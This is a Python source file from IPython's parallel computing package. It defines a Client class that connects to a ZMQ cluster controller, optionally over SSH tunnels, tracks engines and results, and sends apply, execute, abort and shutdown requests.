# xrange is used in a couple 'isinstance' tests in py2
# should be just 'range' in 3k
xrange = range
#--------------------------------------------------------------------------
# Decorators for Client methods
#--------------------------------------------------------------------------
@decorator
def spin_first(f, self, *args, **kwargs):
"""Call spin() to sync state prior to calling the method."""
self.spin()
return f(self, *args, **kwargs)
#--------------------------------------------------------------------------
# Classes
#--------------------------------------------------------------------------
class ExecuteReply(object):
"""wrapper for finished Execute results"""
def __init__(self, msg_id, content, metadata):
self.msg_id = msg_id
self._content = content
self.execution_count = content['execution_count']
self.metadata = metadata
def __getitem__(self, key):
return self.metadata[key]
def __getattr__(self, key):
if key not in self.metadata:
raise AttributeError(key)
return self.metadata[key]
def __repr__(self):
pyout = self.metadata['pyout'] or {'data':{}}
text_out = pyout['data'].get('text/plain', '')
if len(text_out) > 32:
text_out = text_out[:29] + '...'
return "<ExecuteReply[%i]: %s>" % (self.execution_count, text_out)
def _repr_pretty_(self, p, cycle):
pyout = self.metadata['pyout'] or {'data':{}}
text_out = pyout['data'].get('text/plain', '')
if not text_out:
return
try:
ip = get_ipython()
except NameError:
colors = "NoColor"
else:
colors = ip.colors
if colors == "NoColor":
out = normal = ""
else:
out = TermColors.Red
normal = TermColors.Normal
if '\n' in text_out and not text_out.startswith('\n'):
# add newline for multiline reprs
text_out = '\n' + text_out
p.text(
out + 'Out[%i:%i]: ' % (
self.metadata['engine_id'], self.execution_count
) + normal + text_out
)
def _repr_html_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("text/html")
def _repr_latex_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("text/latex")
def _repr_json_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("application/json")
def _repr_javascript_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("application/javascript")
def _repr_png_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/png")
def _repr_jpeg_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/jpeg")
def _repr_svg_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/svg+xml")
class Metadata(dict):
"""Subclass of dict for initializing metadata values.
Attribute access works on keys.
These objects have a strict set of keys - errors will raise if you try
to add new keys.
"""
def __init__(self, *args, **kwargs):
dict.__init__(self)
md = {'msg_id' : None,
'submitted' : None,
'started' : None,
'completed' : None,
'received' : None,
'engine_uuid' : None,
'engine_id' : None,
'follow' : None,
'after' : None,
'status' : None,
'pyin' : None,
'pyout' : None,
'pyerr' : None,
'stdout' : '',
'stderr' : '',
'outputs' : [],
'data': {},
'outputs_ready' : False,
}
self.update(md)
self.update(dict(*args, **kwargs))
def __getattr__(self, key):
"""getattr aliased to getitem"""
if key in iter(self.keys()):
return self[key]
else:
raise AttributeError(key)
def __setattr__(self, key, value):
"""setattr aliased to setitem, with strict"""
if key in iter(self.keys()):
self[key] = value
else:
raise AttributeError(key)
def __setitem__(self, key, value):
"""strict static key enforcement"""
if key in iter(self.keys()):
dict.__setitem__(self, key, value)
else:
raise KeyError(key)
class Client(HasTraits):
"""A semi-synchronous client to the IPython ZMQ cluster
Parameters
----------
url_file : str/unicode; path to ipcontroller-client.json
This JSON file should contain all the information needed to connect to a cluster,
and is likely the only argument needed.
Connection information for the Hub's registration. If a json connector
file is given, then likely no further configuration is necessary.
[Default: use profile]
profile : bytes
The name of the Cluster profile to be used to find connector information.
If run from an IPython application, the default profile will be the same
as the running application, otherwise it will be 'default'.
cluster_id : str
String id to added to runtime files, to prevent name collisions when using
multiple clusters with a single profile simultaneously.
When set, will look for files named like: 'ipcontroller-<cluster_id>-client.json'
Since this is text inserted into filenames, typical recommendations apply:
Simple character strings are ideal, and spaces are not recommended (but
should generally work)
context : zmq.Context
Pass an existing zmq.Context instance, otherwise the client will create its own.
debug : bool
flag for lots of message printing for debug purposes
timeout : int/float
time (in seconds) to wait for connection replies from the Hub
[Default: 10]
#-------------- session related args ----------------
config : Config object
If specified, this will be relayed to the Session for configuration
username : str
set username for the session object
#-------------- ssh related args ----------------
# These are args for configuring the ssh tunnel to be used
# credentials are used to forward connections over ssh to the Controller
# Note that the ip given in `addr` needs to be relative to sshserver
# The most basic case is to leave addr as pointing to localhost (127.0.0.1),
# and set sshserver as the same machine the Controller is on. However,
# the only requirement is that sshserver is able to see the Controller
# (i.e. is within the same trusted network).
sshserver : str
A string of the form passed to ssh, i.e. 'server.tld' or 'user@server.tld:port'
If keyfile or password is specified, and this is not, it will default to
the ip given in addr.
sshkey : str; path to ssh private key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str
Your ssh password to sshserver. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
paramiko : bool
flag for whether to use paramiko instead of shell ssh for tunneling.
[default: True on win32, False else]
Attributes
----------
ids : list of int engine IDs
requesting the ids attribute always synchronizes
the registration state. To request ids without synchronization,
use semi-private _ids attributes.
history : list of msg_ids
a list of msg_ids, keeping track of all the execution
messages you have submitted in order.
outstanding : set of msg_ids
a set of msg_ids that have been submitted, but whose
results have not yet been received.
results : dict
a dict of all our results, keyed by msg_id
block : bool
determines default behavior when block not specified
in execution methods
Methods
-------
spin
flushes incoming results and registration state changes
control methods spin, and requesting `ids` also ensures up to date
wait
wait on one or more msg_ids
execution methods
apply
legacy: execute, run
data movement
push, pull, scatter, gather
query methods
queue_status, get_result, purge, result_status
control methods
abort, shutdown
"""
block = Bool(False)
outstanding = Set()
results = Instance('collections.defaultdict', (dict,))
metadata = Instance('collections.defaultdict', (Metadata,))
history = List()
debug = Bool(False)
_spin_thread = Any()
_stop_spinning = Any()
profile=Unicode()
def _profile_default(self):
if BaseIPythonApplication.initialized():
# an IPython app *might* be running, try to get its profile
try:
return BaseIPythonApplication.instance().profile
except (AttributeError, MultipleInstanceError):
# could be a *different* subclass of config.Application,
# which would raise one of these two errors.
return 'default'
else:
return 'default'
_outstanding_dict = Instance('collections.defaultdict', (set,))
_ids = List()
_connected=Bool(False)
_ssh=Bool(False)
_context = Instance('zmq.Context')
_config = Dict()
_engines=Instance(util.ReverseDict, (), {})
# _hub_socket=Instance('zmq.Socket')
_query_socket=Instance('zmq.Socket')
_control_socket=Instance('zmq.Socket')
_iopub_socket=Instance('zmq.Socket')
_notification_socket=Instance('zmq.Socket')
_mux_socket=Instance('zmq.Socket')
_task_socket=Instance('zmq.Socket')
_task_scheme=Unicode()
_closed = False
_ignored_control_replies=Integer(0)
_ignored_hub_replies=Integer(0)
def __new__(self, *args, **kw):
# don't raise on positional args
return HasTraits.__new__(self, **kw)
def __init__(self, url_file=None, profile=None, profile_dir=None, ipython_dir=None,
context=None, debug=False,
sshserver=None, sshkey=None, password=None, paramiko=None,
timeout=10, cluster_id=None, **extra_args
):
if profile:
super(Client, self).__init__(debug=debug, profile=profile)
else:
super(Client, self).__init__(debug=debug)
if context is None:
context = zmq.Context.instance()
self._context = context
self._stop_spinning = Event()
if 'url_or_file' in extra_args:
url_file = extra_args['url_or_file']
warnings.warn("url_or_file arg no longer supported, use url_file", DeprecationWarning)
if url_file and util.is_url(url_file):
raise ValueError("single urls cannot be specified, url-files must be used.")
self._setup_profile_dir(self.profile, profile_dir, ipython_dir)
if self._cd is not None:
if url_file is None:
if not cluster_id:
client_json = 'ipcontroller-client.json'
else:
client_json = 'ipcontroller-%s-client.json' % cluster_id
url_file = pjoin(self._cd.security_dir, client_json)
if url_file is None:
raise ValueError(
"I can't find enough information to connect to a hub!"
" Please specify at least one of url_file or profile."
)
with open(url_file) as f:
cfg = json.load(f)
self._task_scheme = cfg['task_scheme']
# sync defaults from args, json:
if sshserver:
cfg['ssh'] = sshserver
location = cfg.setdefault('location', None)
proto,addr = cfg['interface'].split('://')
addr = util.disambiguate_ip_address(addr, location)
cfg['interface'] = "%s://%s" % (proto, addr)
# turn interface,port into full urls:
for key in ('control', 'task', 'mux', 'iopub', 'notification', 'registration'):
cfg[key] = cfg['interface'] + ':%i' % cfg[key]
url = cfg['registration']
if location is not None and addr == LOCALHOST:
# location specified, and connection is expected to be local
if location not in LOCAL_IPS and not sshserver:
# load ssh from JSON *only* if the controller is not on
# this machine
sshserver=cfg['ssh']
if location not in LOCAL_IPS and not sshserver:
# warn if no ssh specified, but SSH is probably needed
# This is only a warning, because the most likely cause
# is a local Controller on a laptop whose IP is dynamic
warnings.warn("""
Controller appears to be listening on localhost, but not on this machine.
If this is true, you should specify Client(...,sshserver='you@%s')
or instruct your controller to listen on an external IP."""%location,
RuntimeWarning)
elif not sshserver:
# otherwise sync with cfg
sshserver = cfg['ssh']
self._config = cfg
self._ssh = bool(sshserver or sshkey or password)
if self._ssh and sshserver is None:
# default to ssh via localhost
sshserver = addr
if self._ssh and password is None:
if tunnel.try_passwordless_ssh(sshserver, sshkey, paramiko):
password=False
else:
password = getpass("SSH Password for %s: "%sshserver)
ssh_kwargs = dict(keyfile=sshkey, password=password, paramiko=paramiko)
# configure and construct the session
try:
extra_args['packer'] = cfg['pack']
extra_args['unpacker'] = cfg['unpack']
extra_args['key'] = cast_bytes(cfg['key'])
extra_args['signature_scheme'] = cfg['signature_scheme']
except KeyError as exc:
msg = '\n'.join([
"Connection file is invalid (missing '{}'), possibly from an old version of IPython.",
"If you are reusing connection files, remove them and start ipcontroller again."
])
raise ValueError(msg.format(exc.message))
self.session = Session(**extra_args)
self._query_socket = self._context.socket(zmq.DEALER)
if self._ssh:
tunnel.tunnel_connection(self._query_socket, cfg['registration'], sshserver, **ssh_kwargs)
else:
self._query_socket.connect(cfg['registration'])
self.session.debug = self.debug
self._notification_handlers = {'registration_notification' : self._register_engine,
'unregistration_notification' : self._unregister_engine,
'shutdown_notification' : lambda msg: self.close(),
}
self._queue_handlers = {'execute_reply' : self._handle_execute_reply,
'apply_reply' : self._handle_apply_reply}
try:
self._connect(sshserver, ssh_kwargs, timeout)
except:
self.close(linger=0)
raise
# last step: setup magics, if we are in IPython:
try:
ip = get_ipython()
except NameError:
return
else:
if 'px' not in ip.magics_manager.magics:
# in IPython but we are the first Client.
# activate a default view for parallel magics.
self.activate()
def __del__(self):
"""cleanup sockets, but _not_ context."""
self.close()
def _setup_profile_dir(self, profile, profile_dir, ipython_dir):
if ipython_dir is None:
ipython_dir = get_ipython_dir()
if profile_dir is not None:
try:
self._cd = ProfileDir.find_profile_dir(profile_dir)
return
except ProfileDirError:
pass
elif profile is not None:
try:
self._cd = ProfileDir.find_profile_dir_by_name(
ipython_dir, profile)
return
except ProfileDirError:
pass
self._cd = None
def _update_engines(self, engines):
"""Update our engines dict and _ids from a dict of the form: {id:uuid}."""
for k,v in engines.items():
eid = int(k)
if eid not in self._engines:
self._ids.append(eid)
self._engines[eid] = v
self._ids = sorted(self._ids)
if sorted(self._engines.keys()) != list(range(len(self._engines))) and \
self._task_scheme == 'pure' and self._task_socket:
self._stop_scheduling_tasks()
def _stop_scheduling_tasks(self):
"""Stop scheduling tasks because an engine has been unregistered
from a pure ZMQ scheduler.
"""
self._task_socket.close()
self._task_socket = None
msg = "An engine has been unregistered, and we are using pure " +\
"ZMQ task scheduling. Task farming will be disabled."
if self.outstanding:
msg += " If you were running tasks when this happened, " +\
"some `outstanding` msg_ids may never resolve."
warnings.warn(msg, RuntimeWarning)
def _build_targets(self, targets):
"""Turn valid target IDs or 'all' into two lists:
(int_ids, uuids).
"""
if not self._ids:
# flush notification socket if no engines yet, just in case
if not self.ids:
raise error.NoEnginesRegistered("Can't build targets without any engines")
if targets is None:
targets = self._ids
elif isinstance(targets, str):
if targets.lower() == 'all':
targets = self._ids
else:
raise TypeError("%r not valid str target, must be 'all'"%(targets))
elif isinstance(targets, int):
if targets < 0:
targets = self.ids[targets]
if targets not in self._ids:
raise IndexError("No such engine: %i"%targets)
targets = [targets]
if isinstance(targets, slice):
indices = list(range(len(self._ids)))[targets]
ids = self.ids
targets = [ ids[i] for i in indices ]
if not isinstance(targets, (tuple, list, xrange)):
raise TypeError("targets by int/slice/collection of ints only, not %s"%(type(targets)))
return [cast_bytes(self._engines[t]) for t in targets], list(targets)
def _connect(self, sshserver, ssh_kwargs, timeout):
"""setup all our socket connections to the cluster. This is called from
__init__."""
# Maybe allow reconnecting?
if self._connected:
return
self._connected=True
def connect_socket(s, url):
if self._ssh:
return tunnel.tunnel_connection(s, url, sshserver, **ssh_kwargs)
else:
return s.connect(url)
self.session.send(self._query_socket, 'connection_request')
# use Poller because zmq.select has wrong units in pyzmq 2.1.7
poller = zmq.Poller()
poller.register(self._query_socket, zmq.POLLIN)
# poll expects milliseconds, timeout is seconds
evts = poller.poll(timeout*1000)
if not evts:
raise error.TimeoutError("Hub connection request timed out")
idents,msg = self.session.recv(self._query_socket,mode=0)
if self.debug:
pprint(msg)
content = msg['content']
# self._config['registration'] = dict(content)
cfg = self._config
if content['status'] == 'ok':
self._mux_socket = self._context.socket(zmq.DEALER)
connect_socket(self._mux_socket, cfg['mux'])
self._task_socket = self._context.socket(zmq.DEALER)
connect_socket(self._task_socket, cfg['task'])
self._notification_socket = self._context.socket(zmq.SUB)
self._notification_socket.setsockopt(zmq.SUBSCRIBE, b'')
connect_socket(self._notification_socket, cfg['notification'])
self._control_socket = self._context.socket(zmq.DEALER)
connect_socket(self._control_socket, cfg['control'])
self._iopub_socket = self._context.socket(zmq.SUB)
self._iopub_socket.setsockopt(zmq.SUBSCRIBE, b'')
connect_socket(self._iopub_socket, cfg['iopub'])
self._update_engines(dict(content['engines']))
else:
self._connected = False
raise Exception("Failed to connect!")
#--------------------------------------------------------------------------
# handlers and callbacks for incoming messages
#--------------------------------------------------------------------------
def _unwrap_exception(self, content):
"""unwrap exception, and remap engine_id to int."""
e = error.unwrap_exception(content)
# print e.traceback
if e.engine_info:
e_uuid = e.engine_info['engine_uuid']
eid = self._engines[e_uuid]
e.engine_info['engine_id'] = eid
return e
def _extract_metadata(self, msg):
header = msg['header']
parent = msg['parent_header']
msg_meta = msg['metadata']
content = msg['content']
md = {'msg_id' : parent['msg_id'],
'received' : datetime.now(),
'engine_uuid' : msg_meta.get('engine', None),
'follow' : msg_meta.get('follow', []),
'after' : msg_meta.get('after', []),
'status' : content['status'],
}
if md['engine_uuid'] is not None:
md['engine_id'] = self._engines.get(md['engine_uuid'], None)
if 'date' in parent:
md['submitted'] = parent['date']
if 'started' in msg_meta:
md['started'] = msg_meta['started']
if 'date' in header:
md['completed'] = header['date']
return md
def _register_engine(self, msg):
"""Register a new engine, and update our connection info."""
content = msg['content']
eid = content['id']
d = {eid : content['uuid']}
self._update_engines(d)
def _unregister_engine(self, msg):
"""Unregister an engine that has died."""
content = msg['content']
eid = int(content['id'])
if eid in self._ids:
self._ids.remove(eid)
uuid = self._engines.pop(eid)
self._handle_stranded_msgs(eid, uuid)
if self._task_socket and self._task_scheme == 'pure':
self._stop_scheduling_tasks()
def _handle_stranded_msgs(self, eid, uuid):
"""Handle messages known to be on an engine when the engine unregisters.
It is possible that this will fire prematurely - that is, an engine will
go down after completing a result, and the client will be notified
of the unregistration and later receive the successful result.
"""
outstanding = self._outstanding_dict[uuid]
for msg_id in list(outstanding):
if msg_id in self.results:
# we already
continue
try:
raise error.EngineError("Engine %r died while running task %r"%(eid, msg_id))
except:
content = error.wrap_exception()
# build a fake message:
msg = self.session.msg('apply_reply', content=content)
msg['parent_header']['msg_id'] = msg_id
msg['metadata']['engine'] = uuid
self._handle_apply_reply(msg)
def _handle_execute_reply(self, msg):
"""Save the reply to an execute_request into our results.
execute messages are never actually used. apply is used instead.
"""
parent = msg['parent_header']
msg_id = parent['msg_id']
if msg_id not in self.outstanding:
if msg_id in self.history:
print(("got stale result: %s"%msg_id))
else:
print(("got unknown result: %s"%msg_id))
else:
self.outstanding.remove(msg_id)
content = msg['content']
header = msg['header']
# construct metadata:
md = self.metadata[msg_id]
md.update(self._extract_metadata(msg))
# is this redundant?
self.metadata[msg_id] = md
e_outstanding = self._outstanding_dict[md['engine_uuid']]
if msg_id in e_outstanding:
e_outstanding.remove(msg_id)
# construct result:
if content['status'] == 'ok':
self.results[msg_id] = ExecuteReply(msg_id, content, md)
elif content['status'] == 'aborted':
self.results[msg_id] = error.TaskAborted(msg_id)
elif content['status'] == 'resubmitted':
# TODO: handle resubmission
pass
else:
self.results[msg_id] = self._unwrap_exception(content)
def _handle_apply_reply(self, msg):
"""Save the reply to an apply_request into our results."""
parent = msg['parent_header']
msg_id = parent['msg_id']
if msg_id not in self.outstanding:
if msg_id in self.history:
print(("got stale result: %s"%msg_id))
print(self.results[msg_id])
print(msg)
else:
print(("got unknown result: %s"%msg_id))
else:
self.outstanding.remove(msg_id)
content = msg['content']
header = msg['header']
# construct metadata:
md = self.metadata[msg_id]
md.update(self._extract_metadata(msg))
# is this redundant?
self.metadata[msg_id] = md
e_outstanding = self._outstanding_dict[md['engine_uuid']]
if msg_id in e_outstanding:
e_outstanding.remove(msg_id)
# construct result:
if content['status'] == 'ok':
self.results[msg_id] = serialize.unserialize_object(msg['buffers'])[0]
elif content['status'] == 'aborted':
self.results[msg_id] = error.TaskAborted(msg_id)
elif content['status'] == 'resubmitted':
# TODO: handle resubmission
pass
else:
self.results[msg_id] = self._unwrap_exception(content)
def _flush_notifications(self):
"""Flush notifications of engine registrations waiting
in ZMQ queue."""
idents,msg = self.session.recv(self._notification_socket, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
msg_type = msg['header']['msg_type']
handler = self._notification_handlers.get(msg_type, None)
if handler is None:
raise Exception("Unhandled message type: %s" % msg_type)
else:
handler(msg)
idents,msg = self.session.recv(self._notification_socket, mode=zmq.NOBLOCK)
def _flush_results(self, sock):
"""Flush task or queue results waiting in ZMQ queue."""
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
msg_type = msg['header']['msg_type']
handler = self._queue_handlers.get(msg_type, None)
if handler is None:
raise Exception("Unhandled message type: %s" % msg_type)
else:
handler(msg)
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
def _flush_control(self, sock):
"""Flush replies from the control channel waiting
in the ZMQ queue.
Currently: ignore them."""
if self._ignored_control_replies <= 0:
return
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
self._ignored_control_replies -= 1
if self.debug:
pprint(msg)
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
def _flush_ignored_control(self):
"""flush ignored control replies"""
while self._ignored_control_replies > 0:
self.session.recv(self._control_socket)
self._ignored_control_replies -= 1
def _flush_ignored_hub_replies(self):
ident,msg = self.session.recv(self._query_socket, mode=zmq.NOBLOCK)
while msg is not None:
ident,msg = self.session.recv(self._query_socket, mode=zmq.NOBLOCK)
def _flush_iopub(self, sock):
"""Flush replies from the iopub channel waiting
in the ZMQ queue.
"""
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
parent = msg['parent_header']
# ignore IOPub messages with no parent.
# Caused by print statements or warnings from before the first execution.
if not parent:
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
continue
msg_id = parent['msg_id']
content = msg['content']
header = msg['header']
msg_type = msg['header']['msg_type']
# init metadata:
md = self.metadata[msg_id]
if msg_type == 'stream':
name = content['name']
s = md[name] or ''
md[name] = s + content['data']
elif msg_type == 'pyerr':
md.update({'pyerr' : self._unwrap_exception(content)})
elif msg_type == 'pyin':
md.update({'pyin' : content['code']})
elif msg_type == 'display_data':
md['outputs'].append(content)
elif msg_type == 'pyout':
md['pyout'] = content
elif msg_type == 'data_message':
data, remainder = serialize.unserialize_object(msg['buffers'])
md['data'].update(data)
elif msg_type == 'status':
# idle message comes after all outputs
if content['execution_state'] == 'idle':
md['outputs_ready'] = True
else:
# unhandled msg_type (status, etc.)
pass
# reduntant?
self.metadata[msg_id] = md
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
#--------------------------------------------------------------------------
# len, getitem
#--------------------------------------------------------------------------
def __len__(self):
"""len(client) returns # of engines."""
return len(self.ids)
def __getitem__(self, key):
"""index access returns DirectView multiplexer objects
Must be int, slice, or list/tuple/xrange of ints"""
if not isinstance(key, (int, slice, tuple, list, xrange)):
raise TypeError("key by int/slice/iterable of ints only, not %s"%(type(key)))
else:
return self.direct_view(key)
#--------------------------------------------------------------------------
# Begin public methods
#--------------------------------------------------------------------------
@property
def ids(self):
"""Always up-to-date ids property."""
self._flush_notifications()
# always copy:
return list(self._ids)
def activate(self, targets='all', suffix=''):
"""Create a DirectView and register it with IPython magics
Defines the magics `%px, %autopx, %pxresult, %%px`
Parameters
----------
targets: int, list of ints, or 'all'
The engines on which the view's magics will run
suffix: str [default: '']
The suffix, if any, for the magics. This allows you to have
multiple views associated with parallel magics at the same time.
e.g. ``rc.activate(targets=0, suffix='0')`` will give you
the magics ``%px0``, ``%pxresult0``, etc. for running magics just
on engine 0.
"""
view = self.direct_view(targets)
view.block = True
view.activate(suffix)
return view
def close(self, linger=None):
"""Close my zmq Sockets
If `linger`, set the zmq LINGER socket option,
which allows discarding of messages.
"""
if self._closed:
return
self.stop_spin_thread()
snames = [ trait for trait in self.trait_names() if trait.endswith("socket") ]
for name in snames:
socket = getattr(self, name)
if socket is not None and not socket.closed:
if linger is not None:
socket.close(linger=linger)
else:
socket.close()
self._closed = True
def _spin_every(self, interval=1):
"""target func for use in spin_thread"""
while True:
if self._stop_spinning.is_set():
return
time.sleep(interval)
self.spin()
def spin_thread(self, interval=1):
"""call Client.spin() in a background thread on some regular interval
This helps ensure that messages don't pile up too much in the zmq queue
while you are working on other things, or just leaving an idle terminal.
It also helps limit potential padding of the `received` timestamp
on AsyncResult objects, used for timings.
Parameters
----------
interval : float, optional
The interval on which to spin the client in the background thread
(simply passed to time.sleep).
Notes
-----
For precision timing, you may want to use this method to put a bound
on the jitter (in seconds) in `received` timestamps used
in AsyncResult.wall_time.
"""
if self._spin_thread is not None:
self.stop_spin_thread()
self._stop_spinning.clear()
self._spin_thread = Thread(target=self._spin_every, args=(interval,))
self._spin_thread.daemon = True
self._spin_thread.start()
def stop_spin_thread(self):
"""stop background spin_thread, if any"""
if self._spin_thread is not None:
self._stop_spinning.set()
self._spin_thread.join()
self._spin_thread = None
def spin(self):
"""Flush any registration notifications and execution results
waiting in the ZMQ queue.
"""
if self._notification_socket:
self._flush_notifications()
if self._iopub_socket:
self._flush_iopub(self._iopub_socket)
if self._mux_socket:
self._flush_results(self._mux_socket)
if self._task_socket:
self._flush_results(self._task_socket)
if self._control_socket:
self._flush_control(self._control_socket)
if self._query_socket:
self._flush_ignored_hub_replies()
def wait(self, jobs=None, timeout=-1):
"""waits on one or more `jobs`, for up to `timeout` seconds.
Parameters
----------
jobs : int, str, or list of ints and/or strs, or one or more AsyncResult objects
ints are indices to self.history
strs are msg_ids
default: wait on all outstanding messages
timeout : float
a time in seconds, after which to give up.
default is -1, which means no timeout
Returns
-------
True : when all msg_ids are done
False : timeout reached, some msg_ids still outstanding
"""
tic = time.time()
if jobs is None:
theids = self.outstanding
else:
if isinstance(jobs, (int, str, AsyncResult)):
jobs = [jobs]
theids = set()
for job in jobs:
if isinstance(job, int):
# index access
job = self.history[job]
elif isinstance(job, AsyncResult):
list(map(theids.add, job.msg_ids))
continue
theids.add(job)
if not theids.intersection(self.outstanding):
return True
self.spin()
while theids.intersection(self.outstanding):
if timeout >= 0 and ( time.time()-tic ) > timeout:
break
time.sleep(1e-3)
self.spin()
return len(theids.intersection(self.outstanding)) == 0
#--------------------------------------------------------------------------
# Control methods
#--------------------------------------------------------------------------
@spin_first
def clear(self, targets=None, block=None):
"""Clear the namespace in target(s)."""
block = self.block if block is None else block
targets = self._build_targets(targets)[0]
for t in targets:
self.session.send(self._control_socket, 'clear_request', content={}, ident=t)
error = False
if block:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket,0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if error:
raise error
@spin_first
def abort(self, jobs=None, targets=None, block=None):
"""Abort specific jobs from the execution queues of target(s).
This is a mechanism to prevent jobs that have already been submitted
from executing.
Parameters
----------
jobs : msg_id, list of msg_ids, or AsyncResult
The jobs to be aborted
If unspecified/None: abort all outstanding jobs.
"""
block = self.block if block is None else block
jobs = jobs if jobs is not None else list(self.outstanding)
targets = self._build_targets(targets)[0]
msg_ids = []
if isinstance(jobs, (str,AsyncResult)):
jobs = [jobs]
bad_ids = [obj for obj in jobs if not isinstance(obj, (str, AsyncResult))]
if bad_ids:
raise TypeError("Invalid msg_id type %r, expected str or AsyncResult"%bad_ids[0])
for j in jobs:
if isinstance(j, AsyncResult):
msg_ids.extend(j.msg_ids)
else:
msg_ids.append(j)
content = dict(msg_ids=msg_ids)
for t in targets:
self.session.send(self._control_socket, 'abort_request',
content=content, ident=t)
error = False
if block:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket,0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if error:
raise error
@spin_first
def shutdown(self, targets='all', restart=False, hub=False, block=None):
"""Terminates one or more engine processes, optionally including the hub.
Parameters
----------
targets: list of ints or 'all' [default: all]
Which engines to shutdown.
hub: bool [default: False]
Whether to include the Hub. hub=True implies targets='all'.
block: bool [default: self.block]
Whether to wait for clean shutdown replies or not.
restart: bool [default: False]
NOT IMPLEMENTED
whether to restart engines after shutting them down.
"""
from IPython.parallel.error import NoEnginesRegistered
if restart:
raise NotImplementedError("Engine restart is not yet implemented")
block = self.block if block is None else block
if hub:
targets = 'all'
try:
targets = self._build_targets(targets)[0]
except NoEnginesRegistered:
targets = []
for t in targets:
self.session.send(self._control_socket, 'shutdown_request',
content={'restart':restart},ident=t)
error = False
if block or hub:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket, 0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if hub:
time.sleep(0.25)
self.session.send(self._query_socket, 'shutdown_request')
idents,msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
if error:
raise error
#--------------------------------------------------------------------------
# Execution related methods
#--------------------------------------------------------------------------
def _maybe_raise(self, result):
"""wrapper for maybe raising an exception if apply failed."""
if isinstance(result, error.RemoteError):
raise result
return result
def send_apply_request(self, socket, f, args=None, kwargs=None, metadata=None, track=False,
ident=None):
"""construct and send an apply message via a socket.
This is the principal method with which all engine execution is performed by views.
"""
if self._closed:
raise RuntimeError("Client cannot be used after its sockets have been closed")
# defaults:
args = args if args is not None else []
kwargs = kwargs if kwargs is not None else {}
metadata = metadata if metadata is not None else {}
# validate arguments
if not isinstance(f, collections.Callable) and not isinstance(f, Reference):
raise TypeError("f must be callable, not %s"%type(f))
if not isinstance(args, (tuple, list)):
raise TypeError("args must be tuple or list, not %s"%type(args))
if not isinstance(kwargs, dict):
raise TypeError("kwargs must be dict, not %s"%type(kwargs))
if not isinstance(metadata, dict):
raise TypeError("metadata must be dict, not %s"%type(metadata))
bufs = serialize.pack_apply_message(f, args, kwargs,
buffer_threshold=self.session.buffer_threshold,
item_threshold=self.session.item_threshold,
)
msg = self.session.send(socket, "apply_request", buffers=bufs, ident=ident,
metadata=metadata, track=track)
msg_id = msg['header']['msg_id']
self.outstanding.add(msg_id)
if ident:
# possibly routed to a specific engine
if isinstance(ident, list):
ident = ident[-1]
if ident in list(self._engines.values()):
# save for later, in case of engine death
self._outstanding_dict[ident].add(msg_id)
self.history.append(msg_id)
self.metadata[msg_id]['submitted'] = datetime.now()
return msg
def send_execute_request(self, socket, code, silent=True, metadata=None, ident=None):
"""construct and send an execute request via a socket.
"""
if self._closed:
raise RuntimeError("Client cannot be used after its sockets have been closed")
# defaults:
metadata = metadata if metadata is not None else {}
# validate arguments
if not isinstance(code, str):
raise TypeError("code must be text, not %s" % type(code))
if not isinstance(metadata, dict):
raise TypeError("metadata must be dict, not %s" % type(metadata))
content = dict(code=code, silent=bool(silent), user_variables=[], user_expressions={})
msg = self.session.send(socket, "execute_request", content=content, ident=ident,
metadata=metadata)
msg_id = msg['header']['msg_id']
self.outstanding.add(msg_id)
if ident:
# possibly routed to a specific engine
if isinstance(ident, list):
ident = ident[-1]
if ident in list(self._engines.values()):
# save for later, in case of engine death
self._outstanding_dict[ident].add(msg_id)
self.history.append(msg_id)
self.metadata[msg_id]['submitted'] = datetime.now()
return msg
#--------------------------------------------------------------------------
# construct a View object
#--------------------------------------------------------------------------
def load_balanced_view(self, targets=None):
"""construct a DirectView object.
If no arguments are specified, create a LoadBalancedView
using all engines.
Parameters
----------
targets: list,slice,int,etc. [default: use all engines]
The subset of engines across which to load-balance
"""
if targets == 'all':
targets = None
if targets is not None:
targets = self._build_targets(targets)[1]
return LoadBalancedView(client=self, socket=self._task_socket, targets=targets)
def direct_view(self, targets='all'):
"""construct a DirectView object.
If no targets are specified, create a DirectView using all engines.
rc.direct_view('all') is distinguished from rc[:] in that 'all' will
evaluate the target engines at each execution, whereas rc[:] will connect to
all *current* engines, and that list will not change.
That is, 'all' will always use all engines, whereas rc[:] will not use
engines added after the DirectView is constructed.
Parameters
----------
targets: list,slice,int,etc. [default: use all engines]
The engines to use for the View
"""
single = isinstance(targets, int)
# allow 'all' to be lazily evaluated at each execution
if targets != 'all':
targets = self._build_targets(targets)[1]
if single:
targets = targets[0]
return DirectView(client=self, socket=self._mux_socket, targets=targets)
